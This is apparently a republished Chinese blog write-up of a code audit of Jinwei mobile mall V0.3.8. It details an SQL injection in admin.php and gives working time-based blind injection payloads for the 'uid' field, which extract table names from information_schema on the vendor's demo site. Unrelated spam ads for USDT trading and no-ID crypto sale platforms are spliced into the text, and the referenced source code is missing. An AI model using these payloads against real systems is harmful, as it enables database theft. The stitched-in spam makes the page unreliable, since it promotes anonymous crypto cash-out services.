欢迎访问本站!

首页科技正文

买usdt最便宜的地方(www.payusdt.vip):记一次简朴的审计

admin2021-04-0881安全技术漏洞分析

USDT自动充值API接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

前言

上次在逛先知的时刻,无意间看到了L4zily师傅的这篇文章:https://xz.aliyun.com/t/9114 ,以是有了这篇,该版本为金微手机商城 V0.3.8版本

正题

我们直接去官方搭建的演示站,直接接见/admin.php

我们先看Jms_0.3.8\admin.php的源码:

这里的第8行是传入数据给$m,然后当$m不为空时,会触发Jms_0.3.8\common.php的Dec函数,其功效主要是对传入的数据json解码:

然则这里return时,会由于$c为true而去触发Jms_0.3.8\common.php的Rpl函数,其内容为:

这里是举行了过滤,过滤的主要是一些不能显示的字符和\ * ' " % 空格
然后举行判断,当$m[“act”]不为idx或者是lgn时会进入if判断,然后回执行sql语句,首先先看这段sql语句:

,

USDT线上交易

U交所(www.9cx.net),全球頂尖的USDT場外擔保交易平臺。

,

我们可以看到我们可以对$m[“uid”]举行处置来举行sql注入,然后再来看Jms_0.3.8\common.php的Qry函数:

功效只是执行语句,没有其它的过滤,以是重新回到注入点

我们可以直接去主站的演示站举行这样组织:POST传入: {"act":"f1hgb","uid":"213123213121||sleep(5)"}

可以看到举行了延时,然后由于是或,以是会有几个数据表就会延时若干次5秒,以是这里显示的是10秒。
然后由于没有对sql的要害字举行过滤,以是我们可以直接举行时间盲注,由于过滤了引号,以是使用16进制,以是先测试第一个字母为j其16进制为0x6a,其paylaod: {"act":"f1hgb","uid":"213123213121||(if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),1,1)=0x6a,sleep(5),1))"}

发现是存正延时的,当我们换成第一个字母为k,其16进制为0x6b时,payload: {"act":"f1hgb","uid":"213123213121||(if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),1,1)=0x6b,sleep(5),1))"}

发现就没有延时。后面只需要替换table_name等就可以举行sql注入获取用户名等。

网友评论